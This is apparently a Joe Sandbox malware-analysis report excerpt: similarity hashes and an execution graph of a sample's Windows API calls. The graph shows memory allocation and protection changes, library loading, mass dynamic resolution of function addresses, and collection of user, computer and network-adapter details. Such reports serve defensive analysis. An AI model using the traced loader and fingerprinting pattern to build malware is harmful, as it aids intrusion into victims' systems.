                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Local$AllocFree
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2012307162-0
                                                                                                                                                                                • Opcode ID: 0b5a035d4124dc8e50e51233325b3ae070b41f62a61f6b8bf98a5025210ea71d
                                                                                                                                                                                • Instruction ID: d949e597c7ac78868cce0ed2d64f6bce8764c0b0b29585afedc68c8944be1f0d
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b5a035d4124dc8e50e51233325b3ae070b41f62a61f6b8bf98a5025210ea71d
                                                                                                                                                                                • Instruction Fuzzy Hash: C751C0726042159FC715DF28D884AAAB7E8FB49360F550B2EFD66D7290DB30EA04C791

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:1.9%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:99.6%
                                                                                                                                                                                Signature Coverage:7.2%
                                                                                                                                                                                Total number of Nodes:1117
                                                                                                                                                                                Total number of Limit Nodes:21
                                                                                                                                                                                execution_graph 70986 1e51ae122a8 70987 1e51ae1233c 70986->70987 70988 1e51ae122c0 70986->70988 71009 1e51ae1b5f0 DecodePointer 70987->71009 70991 1e51ae122f8 HeapAlloc 70988->70991 70995 1e51ae12321 70988->70995 70999 1e51ae12326 70988->70999 71001 1e51ae122d8 70988->71001 71006 1e51ae1b5f0 DecodePointer 70988->71006 70990 1e51ae12341 71010 1e51ae13b0c 49 API calls _getptd_noexit 70990->71010 70991->70988 70994 1e51ae12331 70991->70994 71007 1e51ae13b0c 49 API calls _getptd_noexit 70995->71007 71008 1e51ae13b0c 49 API calls _getptd_noexit 70999->71008 71001->70991 71003 1e51ae1b62c 49 API calls 2 library calls 71001->71003 71004 1e51ae1b6a0 49 API calls 7 library calls 71001->71004 71005 1e51ae1b0c8 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 71001->71005 71003->71001 71004->71001 71006->70988 71007->70999 71008->70994 71009->70990 71010->70994 71062 1e51ae1bfb8 71063 1e51ae1bfda __crtGetStringTypeA_stat 71062->71063 71064 1e51ae1c036 71063->71064 71065 1e51ae1c016 71063->71065 71090 1e51ae1c00a 71063->71090 71068 1e51ae1c084 71064->71068 71072 1e51ae1c079 71064->71072 71108 1e51ae13a9c 49 API calls _getptd_noexit 71065->71108 71069 1e51ae1c099 71068->71069 71112 1e51ae1bd68 50 API calls 4 library calls 71068->71112 71100 1e51ae23450 71069->71100 71070 1e51ae1c01b 71109 1e51ae13b0c 49 API calls _getptd_noexit 71070->71109 71111 1e51ae13a9c 49 API calls _getptd_noexit 71072->71111 71078 1e51ae1c023 71110 1e51ae1a4e8 7 API calls _invalid_parameter_noinfo 71078->71110 71081 1e51ae1c0c9 GetConsoleMode 71082 1e51ae1c109 71081->71082 71097 1e51ae1c364 _NMSG_WRITE _write_nolock 71081->71097 71084 1e51ae1c118 GetConsoleCP 71082->71084 71082->71097 71083 1e51ae1c73d 71083->71090 71118 1e51ae13b0c 49 API calls _getptd_noexit 71083->71118 71084->71083 71096 1e51ae1c13c _NMSG_WRITE _fgetwc_nolock 71084->71096 71086 1e51ae1c769 71119 1e51ae13a9c 49 API calls _getptd_noexit 71086->71119 71087 1e51ae1c62a WideCharToMultiByte 71087->71097 71120 1e51ae11440 71090->71120 71091 1e51ae247a8 WriteConsoleW CreateFileW _putwch_nolock 71098 1e51ae1c316 71091->71098 71092 1e51ae1c1ee WideCharToMultiByte 71092->71096 71092->71097 71093 1e51ae1c736 71117 1e51ae13abc 49 API calls 2 library calls 71093->71117 71096->71092 71096->71097 71096->71098 71114 1e51ae1d60c 49 API calls _LocaleUpdate::_LocaleUpdate 71096->71114 71097->71083 71097->71087 71097->71090 71097->71093 71115 1e51ae13b0c 49 API calls _getptd_noexit 71097->71115 71116 1e51ae13a9c 49 API calls _getptd_noexit 71097->71116 71098->71091 71098->71096 71098->71097 71101 1e51ae23459 71100->71101 71103 1e51ae23466 71100->71103 71129 1e51ae13b0c 49 API calls _getptd_noexit 71101->71129 71104 1e51ae1c0a0 71103->71104 71130 1e51ae13b0c 49 API calls _getptd_noexit 71103->71130 71104->71097 71113 1e51ae1d224 49 API calls 2 library calls 71104->71113 71106 1e51ae2349d 71131 1e51ae1a4e8 7 API calls _invalid_parameter_noinfo 71106->71131 71108->71070 71109->71078 71110->71090 71111->71070 71112->71069 71113->71081 71114->71096 71115->71097 71116->71097 71117->71083 71118->71086 71119->71090 71121 1e51ae11449 71120->71121 71122 1e51ae19ff8 IsProcessorFeaturePresent 71121->71122 71123 1e51ae11454 71121->71123 71124 1e51ae1a00f 71122->71124 71132 1e51ae17088 RtlCaptureContext RtlLookupFunctionEntry __crtCapturePreviousContext 71124->71132 71126 1e51ae1a022 71133 1e51ae19fac UnhandledExceptionFilter __raise_securityfailure 71126->71133 71129->71104 71130->71106 71131->71104 71132->71126 71134 7ffdf9111330 71135 7ffdf911133e VirtualAllocExNuma 71134->71135 71136 7ffdf9111336 71134->71136 71138 7ffdf91113e2 71135->71138 71138->71138 71011 1e51ade4740 71014 1e51ade4af0 VirtualAllocExNuma 71011->71014 71015 1e51ade4749 71014->71015 71139 1e51ae1393c 71140 1e51ae13958 71139->71140 71144 1e51ae1395d 71139->71144 71153 1e51ae1e074 GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter __security_init_cookie 71140->71153 71142 1e51ae139b2 71143 1e51ae139e8 71143->71142 71155 1e51ade4300 71143->71155 71144->71142 71144->71143 71154 1e51ae137dc 87 API calls 16 library calls 71144->71154 71149 1e51ade4300 _DllMainCRTStartup 122 API calls 71150 1e51ae13a22 71149->71150 71159 1e51ae137dc 87 API calls 16 library calls 71150->71159 71152 1e51ae13a2f 71152->71142 71160 1e51ae137dc 87 API calls 16 library calls 71152->71160 71153->71144 71154->71143 71156 1e51ade4323 71155->71156 71157 1e51ade4321 71155->71157 71161 1e51ade4340 71156->71161 71157->71149 71157->71152 71159->71152 71160->71142 71205 1e51ade4750 71161->71205 71163 1e51ade4374 _NMSG_WRITE 71164 1e51ade4402 SHGetSpecialFolderPathW lstrcatW lstrcatW lstrcatW lstrcatW 71163->71164 71216 1e51ade56e0 71164->71216 71166 1e51ade449a SafeRWList 71167 1e51ade46af 71166->71167 71226 1e51adeacf0 51 API calls 4 library calls 71166->71226 71242 1e51ade58c0 60 API calls 2 library calls 71167->71242 71170 1e51ade44c7 71227 1e51ade4a40 83 API calls 4 library calls 71170->71227 71171 1e51ade46bc 71243 1e51ade4700 60 API calls 2 library calls 71171->71243 71174 1e51ade46ca collate 71176 1e51ae11440 _Stoxflt 4 API calls 71174->71176 71175 1e51ade44dc std::runtime_error::runtime_error 71228 1e51adeb0a0 74 API calls 8 library calls 71175->71228 71178 1e51ade46e8 71176->71178 71178->71157 71179 1e51ade4505 Concurrency::details::SchedulerBase::PushRunnableToInactive 71229 1e51adeb0a0 74 API calls 8 library calls 71179->71229 71181 1e51ade4527 71230 1e51ade5540 51 API calls 4 library calls 71181->71230 71183 1e51ade453c 71231 1e51ade4a40 83 API calls 4 library calls 71183->71231 71185 1e51ade4552 std::runtime_error::runtime_error 71232 1e51adeb0a0 74 API calls 8 library calls 71185->71232 71187 1e51ade457b Concurrency::details::SchedulerBase::PushRunnableToInactive collate 71233 1e51adeb0a0 74 API calls 8 library calls 71187->71233 71189 1e51ade45ab 71234 1e51ade5540 51 API calls 4 library calls 71189->71234 71191 1e51ade45bf 71235 1e51ade4a40 83 API calls 4 library calls 71191->71235 71193 1e51ade45d5 std::runtime_error::runtime_error 71236 1e51adeb0a0 74 API calls 8 library calls 71193->71236 71195 1e51ade45fe Concurrency::details::SchedulerBase::PushRunnableToInactive collate 71237 1e51adeb0a0 74 API calls 8 library calls 71195->71237 71197 1e51ade462e 71238 1e51ade5540 51 API calls 4 library calls 71197->71238 71199 1e51ade4640 71239 1e51ade4a40 83 API calls 4 library calls 71199->71239 71201 1e51ade4656 std::runtime_error::runtime_error 71240 1e51adeb0a0 74 API calls 8 library calls 71201->71240 71203 1e51ade467f Concurrency::details::SchedulerBase::PushRunnableToInactive collate 71241 1e51adeb0a0 74 API calls 8 library calls 71203->71241 71206 1e51ade4797 _NMSG_WRITE 71205->71206 71207 1e51ade479b 71206->71207 71208 1e51ade47c7 71206->71208 71244 1e51ade5540 51 API calls 4 library calls 71207->71244 71245 1e51ade5540 51 API calls 4 library calls 71208->71245 71211 1e51ae11440 _Stoxflt 4 API calls 71213 1e51ade4884 71211->71213 71212 1e51ade47d6 _DllMainCRTStartup 71215 1e51ade47af collate _DllMainCRTStartup 71212->71215 71246 1e51ade5670 51 API calls _DllMainCRTStartup 71212->71246 71213->71163 71215->71211 71217 1e51ade5710 Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 71216->71217 71247 1e51ade80d0 78 API calls 2 library calls 71217->71247 71219 1e51ade575a 71248 1e51ade8550 56 API calls 2 library calls 71219->71248 71221 1e51ade57b1 71249 1e51ade85e0 108 API calls 4 library calls 71221->71249 71223 1e51ade5800 71223->71166 71224 1e51ade57d4 71224->71223 71250 1e51ade5050 51 API calls 2 library calls 71224->71250 71226->71170 71227->71175 71228->71179 71229->71181 71230->71183 71231->71185 71232->71187 71233->71189 71234->71191 71235->71193 71236->71195 71237->71197 71238->71199 71239->71201 71240->71203 71241->71167 71242->71171 71243->71174 71244->71215 71245->71212 71246->71215 71247->71219 71248->71221 71249->71224 71250->71223 71251 1e51ae19cdc 71252 1e51ae19d07 __crtDownlevelLocaleNameToLCID ProcessCodePage 71251->71252 71253 1e51ae19d03 GetLocaleInfoEx 71251->71253 71253->71252 71016 1e51e974be0 71018 1e51e974c02 71016->71018 71017 1e51e974c5e 71018->71017 71019 1e51e974c5c NtProtectVirtualMemory 71018->71019 71019->71017 71020 1e51e973f40 71022 1e51e973f69 71020->71022 71021 1e51e973fc9 71022->71021 71023 1e51e973fc7 NtAllocateVirtualMemory 71022->71023 71023->71021 71024 1e519090009 71027 1e519090024 71024->71027 71028 1e51909008a 71027->71028 71029 1e51909015e VirtualAlloc 71028->71029 71031 1e51909001d 71029->71031 71032 1e519090194 71029->71032 71030 1e519090346 LoadLibraryA 71030->71031 71030->71032 71032->71030 71032->71031 71033 1e51e941600 71035 1e51e94162c 71033->71035 71034 1e51e941792 RtlExitUserThread 71035->71034 71042 1e51e973ba0 71035->71042 71037 1e51e941717 71048 1e51e959830 71037->71048 71039 1e51e941735 71040 1e51e96b4e0 RtlFreeHeap 71039->71040 71041 1e51e94173d 71040->71041 71041->71034 71043 1e51e973bc7 71042->71043 71044 1e51e973bd8 71042->71044 71052 1e51e973cd0 RtlFreeHeap 71043->71052 71046 1e51e973c87 71044->71046 71053 1e51e973cd0 RtlFreeHeap 71044->71053 71046->71037 71050 1e51e95984d 71048->71050 71049 1e51e959886 71050->71049 71054 1e51e95dfc0 71050->71054 71052->71044 71053->71046 71055 1e51e95dff1 71054->71055 71057 1e51e95e03d 71055->71057 71058 1e51e96b4e0 71055->71058 71057->71049 71059 1e51e96b523 71058->71059 71060 1e51e96b4f0 71058->71060 71059->71057 71060->71059 71061 1e51e96b511 RtlFreeHeap 71060->71061 71061->71059 71254 1e51e947bf0 71255 1e51e947c06 71254->71255 71270 1e51e942930 71255->71270 71257 1e51e947c24 71409 1e51e948ed0 71257->71409 71259 1e51e947d64 71442 1e51e947f70 71259->71442 71261 1e51e947d8c 71583 1e51e964d00 GetUserNameW GetComputerNameExW 71261->71583 71263 1e51e947f54 71264 1e51e947da4 71264->71263 71615 1e51e974740 71264->71615 71267 1e51e954700 RtlFreeHeap 71269 1e51e947e3b 71267->71269 71269->71263 71269->71267 71619 1e51e953d90 9 API calls 71269->71619 71620 1e51e948bc0 71269->71620 71669 1e51e94ffe0 71270->71669 71276 1e51e942943 71277 1e51e94f5f5 71276->71277 71741 1e51e94cce0 71276->71741 71277->71257 71280 1e51e94cce0 LdrGetProcedureAddress 71281 1e51e94ee2b 71280->71281 71282 1e51e94cce0 LdrGetProcedureAddress 71281->71282 71283 1e51e94ee54 71282->71283 71284 1e51e94cce0 LdrGetProcedureAddress 71283->71284 71285 1e51e94ee73 71284->71285 71286 1e51e94cce0 LdrGetProcedureAddress 71285->71286 71287 1e51e94ee92 71286->71287 71288 1e51e94cce0 LdrGetProcedureAddress 71287->71288 71289 1e51e94eeb1 71288->71289 71290 1e51e94cce0 LdrGetProcedureAddress 71289->71290 71291 1e51e94eed0 71290->71291 71292 1e51e94cce0 LdrGetProcedureAddress 71291->71292 71293 1e51e94eeef 71292->71293 71294 1e51e94cce0 LdrGetProcedureAddress 71293->71294 71295 1e51e94ef0e 71294->71295 71296 1e51e94cce0 LdrGetProcedureAddress 71295->71296 71297 1e51e94ef2d 71296->71297 71298 1e51e94cce0 LdrGetProcedureAddress 71297->71298 71299 1e51e94ef4c 71298->71299 71300 1e51e94cce0 LdrGetProcedureAddress 71299->71300 71301 1e51e94ef6b 71300->71301 71302 1e51e94cce0 LdrGetProcedureAddress 71301->71302 71303 1e51e94ef8a 71302->71303 71304 1e51e94cce0 LdrGetProcedureAddress 71303->71304 71305 1e51e94efa9 71304->71305 71306 1e51e94cce0 LdrGetProcedureAddress 71305->71306 71307 1e51e94efc8 71306->71307 71308 1e51e94cce0 LdrGetProcedureAddress 71307->71308 71309 1e51e94efe7 71308->71309 71310 1e51e94cce0 LdrGetProcedureAddress 71309->71310 71311 1e51e94f006 71310->71311 71312 1e51e94cce0 LdrGetProcedureAddress 71311->71312 71313 1e51e94f025 71312->71313 71314 1e51e94cce0 LdrGetProcedureAddress 71313->71314 71315 1e51e94f044 71314->71315 71316 1e51e94cce0 LdrGetProcedureAddress 71315->71316 71317 1e51e94f063 71316->71317 71318 1e51e94cce0 LdrGetProcedureAddress 71317->71318 71319 1e51e94f082 71318->71319 71320 1e51e94cce0 LdrGetProcedureAddress 71319->71320 71321 1e51e94f0a1 71320->71321 71322 1e51e94cce0 LdrGetProcedureAddress 71321->71322 71323 1e51e94f0c0 71322->71323 71324 1e51e94cce0 LdrGetProcedureAddress 71323->71324 71325 1e51e94f0df 71324->71325 71326 1e51e94cce0 LdrGetProcedureAddress 71325->71326 71327 1e51e94f0fe 71326->71327 71328 1e51e94cce0 LdrGetProcedureAddress 71327->71328 71329 1e51e94f11d 71328->71329 71330 1e51e94cce0 LdrGetProcedureAddress 71329->71330 71331 1e51e94f13c 71330->71331 71332 1e51e94cce0 LdrGetProcedureAddress 71331->71332 71333 1e51e94f15b 71332->71333 71334 1e51e94cce0 LdrGetProcedureAddress 71333->71334 71335 1e51e94f17a 71334->71335 71336 1e51e94cce0 LdrGetProcedureAddress 71335->71336 71337 1e51e94f199 71336->71337 71338 1e51e94cce0 LdrGetProcedureAddress 71337->71338 71339 1e51e94f1b8 71338->71339 71340 1e51e94cce0 LdrGetProcedureAddress 71339->71340 71341 1e51e94f1d7 71340->71341 71342 1e51e94cce0 LdrGetProcedureAddress 71341->71342 71343 1e51e94f1f6 71342->71343 71344 1e51e94cce0 LdrGetProcedureAddress 71343->71344 71345 1e51e94f215 71344->71345 71346 1e51e94cce0 LdrGetProcedureAddress 71345->71346 71347 1e51e94f234 71346->71347 71348 1e51e94cce0 LdrGetProcedureAddress 71347->71348 71349 1e51e94f253 71348->71349 71350 1e51e94cce0 LdrGetProcedureAddress 71349->71350 71351 1e51e94f272 71350->71351 71352 1e51e94cce0 LdrGetProcedureAddress 71351->71352 71353 1e51e94f291 71352->71353 71354 1e51e94cce0 LdrGetProcedureAddress 71353->71354 71355 1e51e94f2b0 71354->71355 71356 1e51e94cce0 LdrGetProcedureAddress 71355->71356 71357 1e51e94f2cf 71356->71357 71358 1e51e94cce0 LdrGetProcedureAddress 71357->71358 71359 1e51e94f2ee 71358->71359 71360 1e51e94cce0 LdrGetProcedureAddress 71359->71360 71361 1e51e94f30d 71360->71361 71362 1e51e94cce0 LdrGetProcedureAddress 71361->71362 71363 1e51e94f32c 71362->71363 71364 1e51e94cce0 LdrGetProcedureAddress 71363->71364 71365 1e51e94f34b 71364->71365 71366 1e51e94cce0 LdrGetProcedureAddress 71365->71366 71367 1e51e94f36a 71366->71367 71368 1e51e94cce0 LdrGetProcedureAddress 71367->71368 71369 1e51e94f389 71368->71369 71370 1e51e94cce0 LdrGetProcedureAddress 71369->71370 71371 1e51e94f3a8 71370->71371 71372 1e51e94cce0 LdrGetProcedureAddress 71371->71372 71373 1e51e94f3c7 71372->71373 71374 1e51e94cce0 LdrGetProcedureAddress 71373->71374 71375 1e51e94f3e6 71374->71375 71376 1e51e94cce0 LdrGetProcedureAddress 71375->71376 71377 1e51e94f405 71376->71377 71378 1e51e94cce0 LdrGetProcedureAddress 71377->71378 71379 1e51e94f424 71378->71379 71380 1e51e94cce0 LdrGetProcedureAddress 71379->71380 71381 1e51e94f443 71380->71381 71382 1e51e94cce0 LdrGetProcedureAddress 71381->71382 71383 1e51e94f462 71382->71383 71384 1e51e94cce0 LdrGetProcedureAddress 71383->71384 71385 1e51e94f481 71384->71385 71386 1e51e94cce0 LdrGetProcedureAddress 71385->71386 71387 1e51e94f4a0 71386->71387 71388 1e51e94cce0 LdrGetProcedureAddress 71387->71388 71389 1e51e94f4bf 71388->71389 71390 1e51e94cce0 LdrGetProcedureAddress 71389->71390 71391 1e51e94f4de 71390->71391 71392 1e51e94cce0 LdrGetProcedureAddress 71391->71392 71393 1e51e94f4fd 71392->71393 71394 1e51e94cce0 LdrGetProcedureAddress 71393->71394 71395 1e51e94f51c 71394->71395 71396 1e51e94cce0 LdrGetProcedureAddress 71395->71396 71397 1e51e94f53b 71396->71397 71398 1e51e94cce0 LdrGetProcedureAddress 71397->71398 71399 1e51e94f55a 71398->71399 71400 1e51e94cce0 LdrGetProcedureAddress 71399->71400 71401 1e51e94f579 71400->71401 71402 1e51e94cce0 LdrGetProcedureAddress 71401->71402 71403 1e51e94f598 71402->71403 71404 1e51e94cce0 LdrGetProcedureAddress 71403->71404 71405 1e51e94f5b7 71404->71405 71406 1e51e94cce0 LdrGetProcedureAddress 71405->71406 71407 1e51e94f5d6 71406->71407 71408 1e51e94cce0 LdrGetProcedureAddress 71407->71408 71408->71277 71745 1e51e964ce0 71409->71745 71414 1e51e973de0 RtlFreeHeap 71415 1e51e9490af 71414->71415 71416 1e51e973de0 RtlFreeHeap 71415->71416 71417 1e51e949110 71416->71417 71418 1e51e973de0 RtlFreeHeap 71417->71418 71419 1e51e94916c 71418->71419 71420 1e51e973de0 RtlFreeHeap 71419->71420 71421 1e51e9491a1 71420->71421 71422 1e51e973de0 RtlFreeHeap 71421->71422 71423 1e51e9491f1 71422->71423 71424 1e51e973de0 RtlFreeHeap 71423->71424 71425 1e51e949222 71424->71425 71426 1e51e973de0 RtlFreeHeap 71425->71426 71427 1e51e94925a 71426->71427 71428 1e51e973de0 RtlFreeHeap 71427->71428 71429 1e51e9492af 71428->71429 71430 1e51e973de0 RtlFreeHeap 71429->71430 71431 1e51e9492f1 71430->71431 71432 1e51e973de0 RtlFreeHeap 71431->71432 71433 1e51e949333 71432->71433 71434 1e51e973de0 RtlFreeHeap 71433->71434 71435 1e51e949347 71434->71435 71436 1e51e973de0 RtlFreeHeap 71435->71436 71437 1e51e949362 71436->71437 71438 1e51e973de0 RtlFreeHeap 71437->71438 71439 1e51e94938e 71438->71439 71440 1e51e973de0 RtlFreeHeap 71439->71440 71441 1e51e9493c1 71440->71441 71441->71259 71443 1e51e947f99 71442->71443 71444 1e51e947fb8 71442->71444 71445 1e51e973de0 RtlFreeHeap 71443->71445 71446 1e51e947fda 71444->71446 71447 1e51e973de0 RtlFreeHeap 71444->71447 71445->71444 71751 1e51e965560 71446->71751 71447->71446 71450 1e51e965560 RtlFreeHeap 71455 1e51e948066 71450->71455 71452 1e51e94802a 71452->71450 71453 1e51e948088 71454 1e51e965560 RtlFreeHeap 71453->71454 71459 1e51e94809c 71454->71459 71455->71453 71456 1e51e96b4e0 RtlFreeHeap 71455->71456 71456->71453 71457 1e51e9480be 71458 1e51e965560 RtlFreeHeap 71457->71458 71463 1e51e9480d2 71458->71463 71459->71457 71461 1e51e96b4e0 RtlFreeHeap 71459->71461 71460 1e51e9480f4 71462 1e51e965560 RtlFreeHeap 71460->71462 71461->71457 71467 1e51e948108 71462->71467 71463->71460 71464 1e51e96b4e0 RtlFreeHeap 71463->71464 71464->71460 71465 1e51e94812a 71466 1e51e965560 RtlFreeHeap 71465->71466 71471 1e51e94813e 71466->71471 71467->71465 71469 1e51e96b4e0 RtlFreeHeap 71467->71469 71468 1e51e948160 71470 1e51e965560 RtlFreeHeap 71468->71470 71469->71465 71475 1e51e948174 71470->71475 71471->71468 71472 1e51e96b4e0 RtlFreeHeap 71471->71472 71472->71468 71473 1e51e948197 71474 1e51e965560 RtlFreeHeap 71473->71474 71479 1e51e9481ab 71474->71479 71475->71473 71476 1e51e96b4e0 RtlFreeHeap 71475->71476 71476->71473 71477 1e51e9481d4 71478 1e51e965560 RtlFreeHeap 71477->71478 71480 1e51e9481e8 71478->71480 71479->71477 71481 1e51e96b4e0 RtlFreeHeap 71479->71481 71482 1e51e94823d 71480->71482 71756 1e51e95be20 RtlFreeHeap 71480->71756 71481->71477 71484 1e51e965560 RtlFreeHeap 71482->71484 71506 1e51e948251 71484->71506 71485 1e51e948214 71489 1e51e96b4e0 RtlFreeHeap 71485->71489 71486 1e51e94838a 71487 1e51e965560 RtlFreeHeap 71486->71487 71488 1e51e94839e 71487->71488 71490 1e51e965560 RtlFreeHeap 71488->71490 71491 1e51e948235 71489->71491 71496 1e51e9483ba 71490->71496 71492 1e51e96b4e0 RtlFreeHeap 71491->71492 71492->71482 71493 1e51e948b86 71493->71261 71494 1e51e948430 71495 1e51e965560 RtlFreeHeap 71494->71495 71497 1e51e948444 71495->71497 71496->71493 71496->71494 71511 1e51e96b4e0 RtlFreeHeap 71496->71511 71498 1e51e94846d 71497->71498 71761 1e51e95be20 RtlFreeHeap 71497->71761 71505 1e51e965560 RtlFreeHeap 71498->71505 71499 1e51e948322 71500 1e51e94835d 71499->71500 71509 1e51e94a050 RtlFreeHeap 71499->71509 71503 1e51e96b4e0 RtlFreeHeap 71500->71503 71507 1e51e94837d 71503->71507 71504 1e51e948460 71508 1e51e96b4e0 RtlFreeHeap 71504->71508 71510 1e51e94848e 71505->71510 71506->71486 71506->71499 71757 1e51e94a050 71506->71757 71512 1e51e96b4e0 RtlFreeHeap 71507->71512 71508->71498 71509->71500 71513 1e51e9484b7 71510->71513 71762 1e51e95be20 RtlFreeHeap 71510->71762 71514 1e51e948423 71511->71514 71512->71486 71517 1e51e965560 RtlFreeHeap 71513->71517 71516 1e51e96b4e0 RtlFreeHeap 71514->71516 71516->71494 71519 1e51e9484d8 71517->71519 71518 1e51e9484aa 71520 1e51e96b4e0 RtlFreeHeap 71518->71520 71521 1e51e948501 71519->71521 71763 1e51e95be20 RtlFreeHeap 71519->71763 71520->71513 71524 1e51e965560 RtlFreeHeap 71521->71524 71523 1e51e9484f4 71525 1e51e96b4e0 RtlFreeHeap 71523->71525 71526 1e51e948522 71524->71526 71525->71521 71527 1e51e94854b 71526->71527 71764 1e51e95be20 RtlFreeHeap 71526->71764 71530 1e51e965560 RtlFreeHeap 71527->71530 71529 1e51e94853e 71531 1e51e96b4e0 RtlFreeHeap 71529->71531 71532 1e51e94856c 71530->71532 71531->71527 71533 1e51e948595 71532->71533 71765 1e51e95be20 RtlFreeHeap 71532->71765 71536 1e51e965560 RtlFreeHeap 71533->71536 71535 1e51e948588 71537 1e51e96b4e0 RtlFreeHeap 71535->71537 71538 1e51e9485b6 71536->71538 71537->71533 71539 1e51e965560 RtlFreeHeap 71538->71539 71540 1e51e9485d2 71539->71540 71540->71493 71541 1e51e96b4e0 RtlFreeHeap 71540->71541 71542 1e51e948625 71541->71542 71543 1e51e96b4e0 RtlFreeHeap 71542->71543 71544 1e51e94865e 71543->71544 71545 1e51e965560 RtlFreeHeap 71544->71545 71546 1e51e948672 71545->71546 71546->71493 71547 1e51e96b4e0 RtlFreeHeap 71546->71547 71548 1e51e948797 71547->71548 71549 1e51e96b4e0 RtlFreeHeap 71548->71549 71550 1e51e9487a4 71549->71550 71551 1e51e965560 RtlFreeHeap 71550->71551 71552 1e51e9487b8 71551->71552 71552->71493 71553 1e51e96b4e0 RtlFreeHeap 71552->71553 71554 1e51e9487ec 71553->71554 71555 1e51e965560 RtlFreeHeap 71554->71555 71556 1e51e948800 71555->71556 71556->71493 71557 1e51e96b4e0 RtlFreeHeap 71556->71557 71558 1e51e94882d 71557->71558 71559 1e51e965560 RtlFreeHeap 71558->71559 71560 1e51e948841 71559->71560 71561 1e51e965560 RtlFreeHeap 71560->71561 71562 1e51e94885d 71561->71562 71562->71493 71563 1e51e96b4e0 RtlFreeHeap 71562->71563 71564 1e51e948897 71563->71564 71565 1e51e965560 RtlFreeHeap 71564->71565 71566 1e51e9488ab 71565->71566 71566->71493 71567 1e51e96b4e0 RtlFreeHeap 71566->71567 71568 1e51e9489c8 71567->71568 71569 1e51e96b4e0 RtlFreeHeap 71568->71569 71570 1e51e9489d5 71569->71570 71571 1e51e965560 RtlFreeHeap 71570->71571 71580 1e51e9489eb 71571->71580 71572 1e51e948aec 71582 1e51e948b47 71572->71582 71767 1e51e95be20 RtlFreeHeap 71572->71767 71573 1e51e96b4e0 RtlFreeHeap 71575 1e51e948b79 71573->71575 71576 1e51e96b4e0 RtlFreeHeap 71575->71576 71576->71493 71578 1e51e948b2a 71581 1e51e96b4e0 RtlFreeHeap 71578->71581 71579 1e51e96b4e0 RtlFreeHeap 71579->71580 71580->71493 71580->71572 71580->71579 71766 1e51e95be20 RtlFreeHeap 71580->71766 71581->71582 71582->71573 71584 1e51e964dc7 GetComputerNameExW 71583->71584 71585 1e51e964db1 71583->71585 71586 1e51e964def 71584->71586 71585->71584 71587 1e51e964df3 GetTokenInformation 71586->71587 71592 1e51e964e4e 71586->71592 71588 1e51e964e1c 71587->71588 71587->71592 71589 1e51e964e3e 71588->71589 71591 1e51e973de0 RtlFreeHeap 71588->71591 71590 1e51e973de0 RtlFreeHeap 71589->71590 71590->71592 71591->71589 71593 1e51e95dfc0 RtlFreeHeap 71592->71593 71594 1e51e964e90 71593->71594 71595 1e51e964eaa GetNativeSystemInfo 71594->71595 71596 1e51e973de0 RtlFreeHeap 71594->71596 71597 1e51e964ee8 71595->71597 71598 1e51e964ed3 71595->71598 71596->71595 71597->71598 71599 1e51e964f17 71597->71599 71600 1e51e973de0 RtlFreeHeap 71598->71600 71601 1e51e973de0 RtlFreeHeap 71599->71601 71602 1e51e964f15 71600->71602 71601->71602 71606 1e51e973de0 RtlFreeHeap 71602->71606 71608 1e51e964f67 71602->71608 71603 1e51e964f8f GetAdaptersInfo 71604 1e51e964fbb 71603->71604 71605 1e51e964fdd 71603->71605 71607 1e51e96b4e0 RtlFreeHeap 71604->71607 71605->71604 71611 1e51e964fea GetAdaptersInfo 71605->71611 71606->71608 71609 1e51e964fc5 71607->71609 71608->71603 71610 1e51e96b4e0 RtlFreeHeap 71609->71610 71612 1e51e964fcd 71610->71612 71611->71604 71613 1e51e964fff 71611->71613 71612->71264 71613->71604 71614 1e51e973de0 RtlFreeHeap 71613->71614 71614->71613 71617 1e51e974759 71615->71617 71616 1e51e9747af 71616->71269 71617->71616 71618 1e51e9747ad NtFreeVirtualMemory 71617->71618 71618->71616 71619->71269 71621 1e51e948bde 71620->71621 71622 1e51e94a050 RtlFreeHeap 71621->71622 71623 1e51e948c5e 71622->71623 71624 1e51e94a050 RtlFreeHeap 71623->71624 71625 1e51e948c97 71624->71625 71626 1e51e96b4e0 RtlFreeHeap 71625->71626 71627 1e51e948cee 71626->71627 71628 1e51e948d5c 71627->71628 71629 1e51e948d44 71627->71629 71630 1e51e948d5e 71627->71630 71631 1e51e94a050 RtlFreeHeap 71628->71631 71633 1e51e948d8b 71628->71633 71629->71628 71634 1e51e94a050 RtlFreeHeap 71629->71634 71632 1e51e94a050 RtlFreeHeap 71630->71632 71631->71633 71632->71628 71635 1e51e96b4e0 RtlFreeHeap 71633->71635 71634->71628 71636 1e51e948d93 71635->71636 71637 1e51e96b4e0 RtlFreeHeap 71636->71637 71638 1e51e948d9b 71637->71638 71639 1e51e948de9 71638->71639 71640 1e51e948df0 71638->71640 71803 1e51e956fa0 LdrGetProcedureAddress RtlFreeHeap 71639->71803 71768 1e51e947830 71640->71768 71643 1e51e948dee 71644 1e51e948e8e 71643->71644 71804 1e51e95be20 RtlFreeHeap 71643->71804 71792 1e51e9417b0 71644->71792 71647 1e51e948e32 71650 1e51e96b4e0 RtlFreeHeap 71647->71650 71648 1e51e948e23 71649 1e51e948e2a 71648->71649 71654 1e51e948e34 71648->71654 71651 1e51e96b4e0 RtlFreeHeap 71649->71651 71652 1e51e948ea4 71650->71652 71651->71647 71653 1e51e96b4e0 RtlFreeHeap 71652->71653 71655 1e51e948eac 71653->71655 71657 1e51e96b4e0 RtlFreeHeap 71654->71657 71656 1e51e96b4e0 RtlFreeHeap 71655->71656 71658 1e51e948eb4 71656->71658 71659 1e51e948e5f 71657->71659 71660 1e51e96b4e0 RtlFreeHeap 71658->71660 71661 1e51e94a050 RtlFreeHeap 71659->71661 71662 1e51e948ebc 71660->71662 71663 1e51e948e71 71661->71663 71662->71269 71664 1e51e96b4e0 RtlFreeHeap 71663->71664 71665 1e51e948e79 71664->71665 71805 1e51e9651d0 RtlFreeHeap 71665->71805 71667 1e51e948e86 71668 